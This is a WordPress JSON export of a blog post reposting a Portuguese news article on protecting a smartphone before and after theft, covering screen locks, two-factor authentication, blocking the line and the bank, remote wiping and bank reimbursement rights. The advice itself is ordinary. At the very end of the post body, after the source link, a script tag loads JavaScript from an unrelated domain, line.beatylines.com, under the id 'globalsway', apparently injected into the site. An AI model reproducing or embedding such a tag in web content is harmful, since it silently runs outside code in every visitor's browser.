{"id":1052,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/como-proteger-celular-em-caso-de-roubo-e-evitar-prejuizo-maior-18-05-2022\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"como-proteger-celular-em-caso-de-roubo-e-evitar-prejuizo-maior-18-05-2022","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/como-proteger-celular-em-caso-de-roubo-e-evitar-prejuizo-maior-18-05-2022\/","title":{"rendered":"Como proteger celular em caso de roubo e evitar preju\u00edzo maior &#8211; 18\/05\/2022"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p class=\"lead\">Conhe\u00e7a medidas para se proteger tanto antes quanto depois de um roubo<\/p>\n<p>Se h\u00e1 alguns anos ter o <a href=\"https:\/\/www.uol.com.br\/tilt\/smartphone\/\">celular<\/a> roubado j\u00e1 representava um preju\u00edzo financeiro, hoje ele pode ser maior. Com o aprimoramento da tecnologia &#8211; e tamb\u00e9m das habilidades dos criminosos &#8211; a perda do aparelho pode se tornar um preju\u00edzo pequeno em compara\u00e7\u00e3o ao que uma quadrilha consegue fazer se tiver acesso a documentos, contas em <a href=\"https:\/\/www.uol.com.br\/tilt\/redes-sociais\/ \">redes sociais<\/a> e, principalmente, a contas banc\u00e1rias da v\u00edtima.<\/p>\n<p>Muitos roubos t\u00eam acontecido enquanto a v\u00edtima usa o aparelho &#8211; e, portanto, ele est\u00e1 desbloqueado. &#8220;\u00c9 aquele roubo no qual a pessoa passa correndo ou de bicicleta e arranca o aparelho da sua m\u00e3o. Tamb\u00e9m pode acontecer no tr\u00e2nsito. O intuito \u00e9 pegar o celular desbloqueado e ter acesso mais f\u00e1cil \u00e0s informa\u00e7\u00f5es&#8221;, aponta Hiago Kin, presidente da Associa\u00e7\u00e3o Brasileira de Seguran\u00e7a Cibern\u00e9tica.<\/p>\n<p>Nesse caso, a v\u00edtima tem poucos minutos para fazer o bloqueio do aparelho antes que o criminoso comece a acessar seus dados. &#8220;Ele mant\u00e9m a tela ativa, coloca o chip em outro dispositivo e come\u00e7a tentar trocar senhas a partir do SMS (muitos aplicativos d\u00e3o essa op\u00e7\u00e3o)&#8221;, aponta Kin.<\/p>\n<p>Outra modalidade \u00e9 furto ou roubo com o celular bloqueado. Nesse caso, a quadrilha busca varrer a mem\u00f3ria do aparelho com programas usados por hackers. &#8220;O objetivo n\u00e3o \u00e9 trocar senhas de contas, mas obter informa\u00e7\u00f5es que est\u00e3o offline no aparelho. Documentos e dados pessoais s\u00e3o usados para abrir contas em outros bancos, que n\u00e3o o da v\u00edtima, e aplicar golpes&#8221;, diz o especialista.<\/p>\n<p>A seguir, veja as orienta\u00e7\u00f5es de especialistas sobre como aumentar sua seguran\u00e7a:<\/p>\n<h2>Para se proteger antes de eventual roubo<\/h2>\n<p><strong>1. N\u00e3o mexa no celular enquanto anda<\/strong><\/p>\n<p>Antes de qualquer configura\u00e7\u00e3o, Kin recomenda aten\u00e7\u00e3o ao comportamento. &#8220;Evite mexer no celular enquanto se movimenta. As v\u00edtimas t\u00eam esse padr\u00e3o espec\u00edfico. Como o foco est\u00e1 no dispositivo, ela n\u00e3o percebe quem est\u00e1 se aproximando. Antes de mexer no celular, pare em algum lugar, sem movimento, como um com\u00e9rcio.&#8221;<\/p>\n<p><strong>2. Use c\u00f3digo e op\u00e7\u00e3o de bloqueio autom\u00e1tico da tela<\/strong><\/p>\n<p>Escolha o menor tempo poss\u00edvel para bloqueio autom\u00e1tico de tela e assim reduzir as chances de ser roubado com a tela desbloqueada. Alguns celulares oferecem a op\u00e7\u00e3o de bloqueio ap\u00f3s 30 segundos sem utiliza\u00e7\u00e3o.<\/p>\n<p><strong>3. Ative biometria ou reconhecimento facial em aplicativos<\/strong><\/p>\n<p>Procure, nas configura\u00e7\u00f5es de seus aplicativos, a op\u00e7\u00e3o de entrar por meio de biometria e leitura facial. Telegram e <a href=\"https:\/\/www.uol.com.br\/tilt\/whatsapp\/\">Whatsapp<\/a> s\u00e3o exemplos que j\u00e1 permitem essa ativa\u00e7\u00e3o. Ainda que o celular seja roubado com a tela desbloqueada, essa medida dificulta o acesso \u00e0s informa\u00e7\u00f5es.<\/p>\n<p><strong>4. Ative a autentica\u00e7\u00e3o de dois fatores<\/strong><\/p>\n<p>Entre nas configura\u00e7\u00f5es de cada um dos seus principais aplicativos e busque pela op\u00e7\u00e3o de &#8216;privacidade&#8217; para encontrar a op\u00e7\u00e3o de autentica\u00e7\u00e3o de dois fatores.&#8221;Preze sempre por aplicativos que geram c\u00f3digos e n\u00e3o pela autentica\u00e7\u00e3o por SMS, j\u00e1 que o ladr\u00e3o pode estar com seu chip&#8221;, diz Kin.<\/p>\n<p><strong>5. N\u00e3o salve informa\u00e7\u00f5es importantes (como senhas) no aparelho<\/strong><\/p>\n<p>Evite manter qualquer tipo de senha em prints, fotos, e blocos de notas, assim como fotos de seus documentos.<\/p>\n<p>&#8220;Uma boa dica \u00e9 digitar a palavra &#8216;senha&#8217;, &#8216;acesso&#8217;, na busca de mensagens e ver se voc\u00ea j\u00e1 mandou para algu\u00e9m. \u00c0s vezes \u00e9 sua senha para entrar em uma loja online, mas \u00e9 a mesma usada para contar importantes. Os criminosos t\u00eam esse olhar&#8221;, alerta o presidente da Associa\u00e7\u00e3o Brasileira de Seguran\u00e7a Cibern\u00e9tica.<\/p>\n<p><strong>6. Tenha um chip reserva<\/strong><\/p>\n<p>Se desejar manter um n\u00famero de celular nas configura\u00e7\u00f5es de seguran\u00e7a das suas contas, o melhor \u00e9 que n\u00e3o seja o mesmo n\u00famero que voc\u00ea usa no dia a dia.<\/p>\n<p>&#8220;Assim os criminosos n\u00e3o v\u00e3o conseguir trocar a senha solicitando um novo c\u00f3digo por SMS, j\u00e1 que esse outro chip estar\u00e1 na casa, e n\u00e3o no aparelho roubado&#8221;, explica Kin.<\/p>\n<p><strong>7. Revise e configure o limite de seu Pix <\/strong><\/p>\n<p>A Federa\u00e7\u00e3o Brasileira de Bancos alerta que desde abril do ano passado, o usu\u00e1rio pode controlar seu limite no sistema de pagamento instant\u00e2neo, permitindo que ele reduza ou aumente o valor dispon\u00edvel para realizar transa\u00e7\u00f5es e pagamentos.<\/p>\n<p>&#8220;A medida \u00e9 importante para auxiliar o cliente em sua gest\u00e3o e controle de transa\u00e7\u00f5es no Pix. A funcionalidade est\u00e1 dispon\u00edvel no internet banking e nos aplicativos banc\u00e1rios na \u00e1rea &#8216;Meus Limites Pix.&#8217; Com ela, o cliente poder\u00e1 revisar e configurar o valor mais adequado para suas transa\u00e7\u00f5es financeiras do dia a dia&#8221;, disse \u00e0 BBC, em nota.<\/p>\n<div class=\"photoembed-wrapper\">\n<figure class=\"photo photo-embed no-gutter col-sm-24  crop-750x421 limit-crop  figure\" style=\"max-width:750px\" data-format=\"horizontal\">\n<div class=\"image bg\">\n<div class=\"placeholder\" style=\"max-width:750px\">   <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/conteudo.imguol.com.br\/c\/noticias\/22\/2022\/05\/18\/para-quem-foi-roubado-primeiro-passo-deve-ser-bloquear-a-linha-telefonica-1652878517831_v2_750x421.jpg\" class=\"pinit-img\" alt=\"Para quem foi roubado, primeiro passo deve ser bloquear a linha telef\u00f4nica - Mortortion\/Getty Images - Mortortion\/Getty Images\" data-crop=\"{&quot;xs&quot;:&quot;450x253&quot;,&quot;sm&quot;:&quot;750x421&quot;,&quot;md&quot;:&quot;600x337&quot;,&quot;lg&quot;:&quot;750x421&quot;}\" width=\"750\" height=\"421\"\/>  <i class=\"placeholder-mask\" style=\"padding-bottom: 56.13333333333333%\"\/><\/div>\n<\/div><figcaption class=\"container bottom-title\">\n<p>Para quem foi roubado, primeiro passo deve ser bloquear a linha telef\u00f4nica<\/p>\n<p> <span>Imagem: Mortortion\/Getty Images<\/span><\/figcaption><\/figure>\n<\/div>\n<h2>Para se proteger depois que o aparelho foi roubado<\/h2>\n<p><strong>1. Bloqueie a linha <\/strong><\/p>\n<p>Antes de ligar no banco, realizar um boletim de ocorr\u00eancia ou qualquer outra a\u00e7\u00e3o, ligue na operadora e bloqueie a linha. \u00c9 isso que impedir\u00e1 o criminoso de fazer qualquer tipo de liga\u00e7\u00e3o ou receber SMS. Anote o n\u00famero de protocolo que confirma o pedido de bloqueio.<\/p>\n<p><strong>2. Bloqueie as opera\u00e7\u00f5es banc\u00e1rias <\/strong><\/p>\n<p>Depois, ligue no banco para solicitar o bloqueio de todas as opera\u00e7\u00f5es por via m\u00f3vel ou computador.<\/p>\n<p>&#8220;S\u00f3 esses dois passos j\u00e1 apresentam uma dificuldade enorme para os criminosos, que muitas vezes passam para o pr\u00f3ximo aparelho&#8221;, afirma o especialista.<\/p>\n<p><strong>3. Apague os dados do celular <\/strong><\/p>\n<p>Ainda que o aparelho n\u00e3o tenha sido roubado com a tela desbloqueada, o primeiro passo \u00e9 apagar os dados dele. Se o seu aparelho for Android, h\u00e1 quatro op\u00e7\u00f5es para fazer isso:<\/p>\n<p>&#8211; Use a p\u00e1gina do <a href=\"https:\/\/www.uol.com.br\/tilt\/google\/\">Google<\/a> &#8220;Encontre Meu Dispositivo&#8221;;<\/p>\n<p>&#8211; Acesse o aplicativo &#8220;Encontre Meu Dispositivo&#8221; por outro aparelho;<\/p>\n<p>&#8211; Procure a se\u00e7\u00e3o &#8220;Minha Conta&#8221; do Google;<\/p>\n<p>&#8211; Fa\u00e7a uma busca no Google por &#8220;Encontre Meu Dispositivo&#8221;.<\/p>\n<p>J\u00e1 se o celular for um <a href=\"https:\/\/www.uol.com.br\/tilt\/iphone\/\">iPhone<\/a>, que usa o sistema iOS, use o site iCloud (acess\u00edvel por qualquer navegador de internet) ou ent\u00e3o o aplicativo Busca, caso tenha algum outro aparelho da Apple, para apagar os dados.<\/p>\n<p><strong>4. Recupere suas contas <\/strong><\/p>\n<p>O especialista recomenda, em seguida, trocar suas senhas dos aplicativos e verificar quais s\u00e3o os dispositivos conectados naquela conta &#8211; como de email, por exemplo. A\u00ed, desconecte essas contas do aparelho roubado.<\/p>\n<p>Como a troca de senha pede SMS, \u00e9 importante estar com um novo chip.<\/p>\n<p><strong>5. Fa\u00e7a um boletim de ocorr\u00eancia <\/strong><\/p>\n<p>\u00c9 importante fazer todos os processos descritos acima antes de ir \u00e0 delegacia, dado o tempo que a v\u00edtima pode levar para fazer o boletim de concorr\u00eancia &#8211; horas que podem servir para que a quadrilha avance no roubo de dados.<\/p>\n<p>Caso o criminoso tenha tentado aplicar golpes por meio de suas redes sociais, \u00e9 importante compartilhar essas informa\u00e7\u00f5es com a pol\u00edcia.<\/p>\n<p>&#8220;Claro que h\u00e1 de se considerar a possibilidade de o criminoso estar utilizando um CPF que n\u00e3o lhe pertence e uma conta corrente fraudulenta, mas ainda assim, para a den\u00fancia, todo e qualquer dado pode ser relevante e merece ser reportado, j\u00e1 que tais informa\u00e7\u00f5es associadas a outras igualmente relevantes e objeto de den\u00fancias realizadas por outras v\u00edtimas podem contribuir para identifica\u00e7\u00e3o do crime&#8221;, instrui a advogada Alessandra Borelli, CEO da Opice Blum Academy, empresa especializada em conhecimento em direito digital e prote\u00e7\u00e3o de dados.<\/p>\n<h2>Devo pedir ao banco para ressarcir valores se criminosos acessarem minha conta?<\/h2>\n<p>O Idec (Instituto Brasileiro de Defesa do Consumidor) entende que \u00e9 falha no servi\u00e7o dos bancos e institui\u00e7\u00f5es financeiras possu\u00edrem brechas na seguran\u00e7a que permitam que golpistas e fraudadores cometam diversos atos prejudiciais aos consumidores.<\/p>\n<p>&#8220;O Artigo 14 do c\u00f3digo defesa do consumidor estipula que os prestadores de servi\u00e7o, como s\u00e3o as institui\u00e7\u00f5es financeiras, s\u00e3o respons\u00e1veis pela repara\u00e7\u00e3o de danos causados por defeitos nos seus servi\u00e7os &#8211; e um criminoso conseguir acessar o aplicativo \u00e9 considerado, nesse caso, um defeito de seguran\u00e7a. O artigo prev\u00ea garantia para o consumidor sem a necessidade de comprovar qualquer tipo de culpa&#8221;, argumenta Fabio Pasin, advogado do Idec e pesquisador da \u00e1rea de servi\u00e7os financeiros.<\/p>\n<p>O instituto indica que \u00e9 poss\u00edvel registrar uma reclama\u00e7\u00e3o na ouvidoria do banco. Se n\u00e3o conseguir solucionar o problema, a pr\u00f3xima op\u00e7\u00e3o \u00e9 buscar o Procon de sua cidade para que o \u00f3rg\u00e3o medie a recupera\u00e7\u00e3o dos valores perdidos. Al\u00e9m disso, h\u00e1 a op\u00e7\u00e3o de registro de reclama\u00e7\u00e3o no Banco Central.<\/p>\n<p>Se institui\u00e7\u00e3o financeira criou obst\u00e1culos para o cancelamento de transa\u00e7\u00f5es ou passou a cobrar de voc\u00ea valores decorrentes de cart\u00e3o de cr\u00e9dito ou empr\u00e9stimo fraudulento ap\u00f3s sua comunica\u00e7\u00e3o com a empresa, o Idec aponta que a melhor op\u00e7\u00e3o pode ser o ingresso na Justi\u00e7a.<\/p>\n<p>&#8220;Essa \u00e9 a nossa interpreta\u00e7\u00e3o [do Idec] e h\u00e1 eventuais decis\u00f5es contr\u00e1rias no judici\u00e1rio. Mas h\u00e1 base legal para que o consumidor acesse a justi\u00e7a e pe\u00e7a o ressarcimento&#8221;, indica Pasin.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/bbc\/2022\/05\/18\/como-proteger-celular-em-caso-de-roubo-e-evitar-prejuizo-maior.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Conhe\u00e7a medidas para se proteger tanto antes quanto depois de um roubo Se h\u00e1 alguns anos ter o celular roubado j\u00e1 representava um preju\u00edzo financeiro, hoje ele pode ser maior. Com o aprimoramento da tecnologia &#8211; e tamb\u00e9m das habilidades dos criminosos &#8211; a perda do aparelho pode se tornar um preju\u00edzo pequeno em compara\u00e7\u00e3o&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1053,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[1706,154,12,176,1066,1769,197,1707],"class_list":["post-1052","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-caso","tag-celular","tag-como","tag-evitar","tag-maior","tag-prejuizo","tag-proteger","tag-roubo"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1052"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1052\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/1053"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}